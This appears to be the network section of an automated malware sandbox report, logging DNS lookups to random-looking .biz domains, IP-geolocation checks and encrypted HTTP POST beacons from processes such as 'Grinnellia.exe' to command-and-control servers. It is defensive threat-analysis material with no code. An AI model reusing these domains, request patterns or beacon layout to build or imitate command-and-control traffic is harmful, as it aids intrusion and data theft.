Nov 22, 2024 18:56:28.311466932 CET	49884	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:28.431734085 CET	80	49884	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:28.431797028 CET	80	49884	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:50.237118006 CET	80	49884	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:50.239243031 CET	49884	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:50.239281893 CET	49884	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:50.360415936 CET	80	49884	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:50.888180017 CET	49935	80	192.168.2.5	47.129.31.212
Nov 22, 2024 18:56:51.008130074 CET	80	49935	47.129.31.212	192.168.2.5
Nov 22, 2024 18:56:51.008634090 CET	49935	80	192.168.2.5	47.129.31.212
Nov 22, 2024 18:56:51.008776903 CET	49935	80	192.168.2.5	47.129.31.212
Nov 22, 2024 18:56:51.008891106 CET	49935	80	192.168.2.5	47.129.31.212
Nov 22, 2024 18:56:51.128213882 CET	80	49935	47.129.31.212	192.168.2.5
Nov 22, 2024 18:56:51.128355980 CET	80	49935	47.129.31.212	192.168.2.5
Nov 22, 2024 18:56:51.264054060 CET	49710	80	192.168.2.5	132.226.8.169
Nov 22, 2024 18:56:51.463366032 CET	80	49710	132.226.8.169	192.168.2.5
Nov 22, 2024 18:56:53.059329033 CET	80	49935	47.129.31.212	192.168.2.5
Nov 22, 2024 18:56:53.059396029 CET	80	49935	47.129.31.212	192.168.2.5
Nov 22, 2024 18:56:53.059478998 CET	49935	80	192.168.2.5	47.129.31.212
Nov 22, 2024 18:56:53.059587955 CET	49935	80	192.168.2.5	47.129.31.212
Nov 22, 2024 18:56:53.180104971 CET	80	49935	47.129.31.212	192.168.2.5
Nov 22, 2024 18:56:53.689692020 CET	49942	80	192.168.2.5	13.251.16.150
Nov 22, 2024 18:56:53.811608076 CET	80	49942	13.251.16.150	192.168.2.5
Nov 22, 2024 18:56:53.811685085 CET	49942	80	192.168.2.5	13.251.16.150
Nov 22, 2024 18:56:53.815355062 CET	49942	80	192.168.2.5	13.251.16.150
Nov 22, 2024 18:56:53.815382957 CET	49942	80	192.168.2.5	13.251.16.150
Nov 22, 2024 18:56:53.936094999 CET	80	49942	13.251.16.150	192.168.2.5
Nov 22, 2024 18:56:53.936113119 CET	80	49942	13.251.16.150	192.168.2.5
Nov 22, 2024 18:56:55.906182051 CET	80	49942	13.251.16.150	192.168.2.5
Nov 22, 2024 18:56:55.906294107 CET	80	49942	13.251.16.150	192.168.2.5
Nov 22, 2024 18:56:55.906346083 CET	49942	80	192.168.2.5	13.251.16.150
Nov 22, 2024 18:56:55.906390905 CET	49942	80	192.168.2.5	13.251.16.150
Nov 22, 2024 18:56:56.026204109 CET	80	49942	13.251.16.150	192.168.2.5
Nov 22, 2024 18:56:56.478804111 CET	49949	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:56:56.598510027 CET	80	49949	44.221.84.105	192.168.2.5
Nov 22, 2024 18:56:56.598596096 CET	49949	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:56:56.598767996 CET	49949	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:56:56.598787069 CET	49949	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:56:56.718363047 CET	80	49949	44.221.84.105	192.168.2.5
Nov 22, 2024 18:56:56.718385935 CET	80	49949	44.221.84.105	192.168.2.5
Nov 22, 2024 18:56:57.871642113 CET	80	49949	44.221.84.105	192.168.2.5
Nov 22, 2024 18:56:57.871809006 CET	80	49949	44.221.84.105	192.168.2.5
Nov 22, 2024 18:56:57.871887922 CET	49949	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:56:57.873325109 CET	49949	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:56:57.993232012 CET	80	49949	44.221.84.105	192.168.2.5
Nov 22, 2024 18:56:58.623195887 CET	49955	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:56:58.747545004 CET	80	49955	18.141.10.107	192.168.2.5
Nov 22, 2024 18:56:58.747631073 CET	49955	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:56:58.747802973 CET	49955	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:56:58.747802973 CET	49955	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:56:58.873342037 CET	80	49955	18.141.10.107	192.168.2.5
Nov 22, 2024 18:56:58.873460054 CET	80	49955	18.141.10.107	192.168.2.5
Nov 22, 2024 18:57:00.855160952 CET	80	49955	18.141.10.107	192.168.2.5
Nov 22, 2024 18:57:00.855334044 CET	80	49955	18.141.10.107	192.168.2.5
Nov 22, 2024 18:57:00.855402946 CET	49955	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:57:00.864017963 CET	49955	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:57:00.983552933 CET	80	49955	18.141.10.107	192.168.2.5
Nov 22, 2024 18:57:01.378706932 CET	49963	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:01.498483896 CET	80	49963	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:01.498761892 CET	49963	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:01.500308037 CET	49963	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:01.500308037 CET	49963	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:01.619966030 CET	80	49963	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:01.619986057 CET	80	49963	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:02.675498009 CET	80	49963	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:02.679374933 CET	49963	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:02.681428909 CET	49965	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:02.681432009 CET	49963	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:02.801759005 CET	80	49963	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:02.801786900 CET	80	49965	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:02.801917076 CET	49965	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:02.802057028 CET	49965	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:02.802097082 CET	49965	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:02.921668053 CET	80	49965	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:02.921705008 CET	80	49965	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:03.990151882 CET	80	49965	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:03.990263939 CET	49965	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:03.990345955 CET	49965	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:57:04.110080004 CET	80	49965	172.234.222.143	192.168.2.5
Nov 22, 2024 18:57:04.749245882 CET	49971	80	192.168.2.5	34.246.200.160
Nov 22, 2024 18:57:04.869160891 CET	80	49971	34.246.200.160	192.168.2.5
Nov 22, 2024 18:57:04.871053934 CET	49971	80	192.168.2.5	34.246.200.160
Nov 22, 2024 18:57:04.871220112 CET	49971	80	192.168.2.5	34.246.200.160
Nov 22, 2024 18:57:04.871248007 CET	49971	80	192.168.2.5	34.246.200.160
Nov 22, 2024 18:57:04.990961075 CET	80	49971	34.246.200.160	192.168.2.5
Nov 22, 2024 18:57:04.991092920 CET	80	49971	34.246.200.160	192.168.2.5
Nov 22, 2024 18:57:06.344959021 CET	80	49971	34.246.200.160	192.168.2.5
Nov 22, 2024 18:57:06.345004082 CET	80	49971	34.246.200.160	192.168.2.5
Nov 22, 2024 18:57:06.345071077 CET	49971	80	192.168.2.5	34.246.200.160
Nov 22, 2024 18:57:06.345144033 CET	49971	80	192.168.2.5	34.246.200.160
Nov 22, 2024 18:57:06.464921951 CET	80	49971	34.246.200.160	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 18:55:00.627748966 CET	60520	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:01.357222080 CET	53	60520	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:01.782211065 CET	53353	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:01.925343990 CET	53	53353	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:02.534252882 CET	55790	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:02.679636955 CET	53	55790	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:03.905677080 CET	60534	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:04.484926939 CET	53	60534	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:05.188369989 CET	63730	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:05.325177908 CET	53	63730	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:06.893671989 CET	63772	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:07.470069885 CET	53	63772	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:07.841943979 CET	61077	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:07.988662004 CET	53	61077	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:09.412333012 CET	49999	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:09.981972933 CET	53	49999	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:11.262392044 CET	53341	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:11.476964951 CET	50806	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:11.730281115 CET	53	53341	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:12.099250078 CET	53	50806	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:14.769229889 CET	58880	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:14.907454967 CET	53	58880	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:14.952399015 CET	56913	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:15.177236080 CET	53	56913	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:15.181989908 CET	54833	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:15.735441923 CET	53	54833	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:17.485256910 CET	60468	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:17.628526926 CET	53	60468	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:18.153436899 CET	65244	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:18.554524899 CET	53	65244	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:18.573723078 CET	58776	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:18.808522940 CET	53	58776	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:18.838020086 CET	56720	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:19.830667019 CET	53	56720	1.1.1.1	192.168.2.5
Nov 22, 2024 18:55:19.842780113 CET	56720	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:55:19.983797073 CET	53	56720	1.1.1.1	192.168.2.5
Nov 22, 2024 18:56:05.025912046 CET	51068	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:56:05.967082024 CET	53	51068	1.1.1.1	192.168.2.5
Nov 22, 2024 18:56:50.239949942 CET	53019	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:56:50.882004976 CET	53	53019	1.1.1.1	192.168.2.5
Nov 22, 2024 18:56:53.060266972 CET	51429	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:56:53.682539940 CET	53	51429	1.1.1.1	192.168.2.5
Nov 22, 2024 18:56:55.907071114 CET	58407	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:56:56.450983047 CET	53	58407	1.1.1.1	192.168.2.5
Nov 22, 2024 18:56:57.874224901 CET	63205	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:56:58.617075920 CET	53	63205	1.1.1.1	192.168.2.5
Nov 22, 2024 18:57:00.865098953 CET	52216	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:57:01.372210979 CET	53	52216	1.1.1.1	192.168.2.5
Nov 22, 2024 18:57:03.991084099 CET	62310	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:57:04.742625952 CET	53	62310	1.1.1.1	192.168.2.5
Nov 22, 2024 18:57:06.345659971 CET	56925	53	192.168.2.5	1.1.1.1
Nov 22, 2024 18:57:06.901895046 CET	53	56925	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2024 18:55:00.627748966 CET	192.168.2.5	1.1.1.1	0x4641	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:01.782211065 CET	192.168.2.5	1.1.1.1	0xc6bc	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:02.534252882 CET	192.168.2.5	1.1.1.1	0x2a39	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:03.905677080 CET	192.168.2.5	1.1.1.1	0x9c19	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:05.188369989 CET	192.168.2.5	1.1.1.1	0x10fa	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:06.893671989 CET	192.168.2.5	1.1.1.1	0xbb13	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:07.841943979 CET	192.168.2.5	1.1.1.1	0x6e8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:09.412333012 CET	192.168.2.5	1.1.1.1	0xe6d8	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:11.262392044 CET	192.168.2.5	1.1.1.1	0x1333	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:11.476964951 CET	192.168.2.5	1.1.1.1	0xf65d	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:14.769229889 CET	192.168.2.5	1.1.1.1	0xdcf6	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:14.952399015 CET	192.168.2.5	1.1.1.1	0xdbed	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:15.181989908 CET	192.168.2.5	1.1.1.1	0x7898	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:17.485256910 CET	192.168.2.5	1.1.1.1	0x56ec	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:18.153436899 CET	192.168.2.5	1.1.1.1	0x7205	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:18.573723078 CET	192.168.2.5	1.1.1.1	0xf9b3	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:18.838020086 CET	192.168.2.5	1.1.1.1	0x5c16	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:19.842780113 CET	192.168.2.5	1.1.1.1	0x5c16	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:05.025912046 CET	192.168.2.5	1.1.1.1	0x169b	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:50.239949942 CET	192.168.2.5	1.1.1.1	0xf90d	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:53.060266972 CET	192.168.2.5	1.1.1.1	0x604e	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:55.907071114 CET	192.168.2.5	1.1.1.1	0x848a	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:57.874224901 CET	192.168.2.5	1.1.1.1	0x3c1f	Standard query (0)	vcddkls.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:57:00.865098953 CET	192.168.2.5	1.1.1.1	0x5ca2	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:57:03.991084099 CET	192.168.2.5	1.1.1.1	0x1106	Standard query (0)	tbjrpv.biz	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:57:06.345659971 CET	192.168.2.5	1.1.1.1	0x3afc	Standard query (0)	deoci.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 22, 2024 18:55:01.357222080 CET	1.1.1.1	192.168.2.5	0x4641	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:01.925343990 CET	1.1.1.1	192.168.2.5	0xc6bc	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:02.679636955 CET	1.1.1.1	192.168.2.5	0x2a39	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:04.484926939 CET	1.1.1.1	192.168.2.5	0x9c19	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:05.325177908 CET	1.1.1.1	192.168.2.5	0x10fa	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:07.470069885 CET	1.1.1.1	192.168.2.5	0xbb13	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:07.988662004 CET	1.1.1.1	192.168.2.5	0x6e8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 18:55:07.988662004 CET	1.1.1.1	192.168.2.5	0x6e8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:07.988662004 CET	1.1.1.1	192.168.2.5	0x6e8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:07.988662004 CET	1.1.1.1	192.168.2.5	0x6e8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:07.988662004 CET	1.1.1.1	192.168.2.5	0x6e8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:07.988662004 CET	1.1.1.1	192.168.2.5	0x6e8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:09.981972933 CET	1.1.1.1	192.168.2.5	0xe6d8	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:11.730281115 CET	1.1.1.1	192.168.2.5	0x1333	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:11.730281115 CET	1.1.1.1	192.168.2.5	0x1333	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:12.099250078 CET	1.1.1.1	192.168.2.5	0xf65d	No error (0)	przvgke.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:12.099250078 CET	1.1.1.1	192.168.2.5	0xf65d	No error (0)	przvgke.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:14.907454967 CET	1.1.1.1	192.168.2.5	0xdcf6	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:15.177236080 CET	1.1.1.1	192.168.2.5	0xdbed	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:15.735441923 CET	1.1.1.1	192.168.2.5	0x7898	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:17.628526926 CET	1.1.1.1	192.168.2.5	0x56ec	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:18.554524899 CET	1.1.1.1	192.168.2.5	0x7205	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:18.808522940 CET	1.1.1.1	192.168.2.5	0xf9b3	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:19.830667019 CET	1.1.1.1	192.168.2.5	0x5c16	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:55:19.983797073 CET	1.1.1.1	192.168.2.5	0x5c16	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:05.967082024 CET	1.1.1.1	192.168.2.5	0x169b	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:50.882004976 CET	1.1.1.1	192.168.2.5	0xf90d	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:53.682539940 CET	1.1.1.1	192.168.2.5	0x604e	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:56.450983047 CET	1.1.1.1	192.168.2.5	0x848a	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:56:58.617075920 CET	1.1.1.1	192.168.2.5	0x3c1f	No error (0)	vcddkls.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:57:01.372210979 CET	1.1.1.1	192.168.2.5	0x5ca2	No error (0)	fwiwk.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:57:01.372210979 CET	1.1.1.1	192.168.2.5	0x5ca2	No error (0)	fwiwk.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:57:04.742625952 CET	1.1.1.1	192.168.2.5	0x1106	No error (0)	tbjrpv.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Nov 22, 2024 18:57:06.901895046 CET	1.1.1.1	192.168.2.5	0x3afc	No error (0)	deoci.biz		18.208.156.248	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

pywolwnvd.biz

ssbzmoy.biz

cvgrf.biz

checkip.dyndns.org

npukfztj.biz

przvgke.biz

knjghuig.biz

lpuegx.biz

vjaxhpbji.biz

xlfhhhm.biz

ifsaia.biz

saytjshyf.biz

vcddkls.biz

fwiwk.biz

tbjrpv.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	54.244.188.177	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:02.157747030 CET	347	OUT	POST /tp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:02.157766104 CET	778	OUT	Data Raw: 4a 78 df 02 02 7c 8c 13 fe 02 00 00 ad 68 81 aa 7e f2 79 4e dc eb 1d 31 ef 00 76 b0 6b 23 dd 6e e6 41 d8 51 80 6d 7c 3b 62 31 9c eb e8 27 ef 31 ae ad 9e f1 c0 48 b3 74 c3 b4 bb 9c 1f f1 e9 91 f9 38 b1 4c 2d 32 72 cb f0 eb 4b 6a cb bc e1 45 ff de Data Ascii: Jx\|h~yN1vk#nAQm\|;b1'1Ht8L-2rKjEge"+66F(q!fYpR(OIX}38)n5c>YcbMHi>7cz_QR"FDm4k9tXo%Vz,V.[/Xc9b:g)P
Nov 22, 2024 18:55:03.499643087 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=17a749b54eee974c6b99213616949751\|8.46.123.75\|1732298103\|1732298103\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	54.244.188.177	80	6468	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:02.851218939 CET	353	OUT	POST /fowvjqhq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
Nov 22, 2024 18:55:02.851218939 CET	832	OUT	Data Raw: db f1 50 ff 7d 94 0e 13 34 03 00 00 29 a0 16 6b 29 54 d6 10 4b 2f d9 5a bd 2d 29 e8 16 7e bf df 2d 54 ab 74 31 03 b3 a8 4d 04 c6 90 d0 7d bb 32 bb 65 51 e9 d2 17 8e d4 f4 c7 d4 28 3a 30 b9 96 6e 75 0d 2e 3c b5 71 15 d4 32 d5 22 80 87 40 82 68 e2 Data Ascii: P}4)k)TK/Z-)~-Tt1M}2eQ(:0nu.<q2"@hHgTca)9"!KkNbN$1_6TD5p}ls)D;wdggIFEs+tKBVqAX\|{vm~>,7:uJ*\|4+w&.\|g84
Nov 22, 2024 18:55:04.300820112 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=7c062110df0b80ad863566e6b10c6979\|8.46.123.75\|1732298104\|1732298104\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	18.141.10.107	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:04.665410042 CET	358	OUT	POST /pmxflidirkcbpvm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:04.665452003 CET	778	OUT	Data Raw: 75 b3 3f f8 24 46 df 4a fe 02 00 00 b4 28 9d 63 25 8e 51 54 62 3c 05 b3 51 7c 4c 41 b2 e9 fa 75 7d d1 06 cf 8c 64 7e 96 05 84 f8 07 e4 91 7e 67 8b 0c 0c b2 2f e9 45 cf b2 ce 20 1f ec 73 a0 b9 9e 24 84 94 a2 46 e2 c2 4a a2 22 67 8f 92 f3 c3 6c e0 Data Ascii: u?$FJ(c%QTb<Q\|LAu}d~~g/E s$FJ"glxV!=2TnHZq~\HSZYN\|$s$`J=KlPJ)T@n{_PLPh+56@{ebA0\Z"(1f}%P[<]0iRZq
Nov 22, 2024 18:55:06.810857058 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2723e4777baedc043ed341a786159322\|8.46.123.75\|1732298106\|1732298106\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49708	54.244.188.177	80	348	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:05.483361959 CET	349	OUT	POST /ygrk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
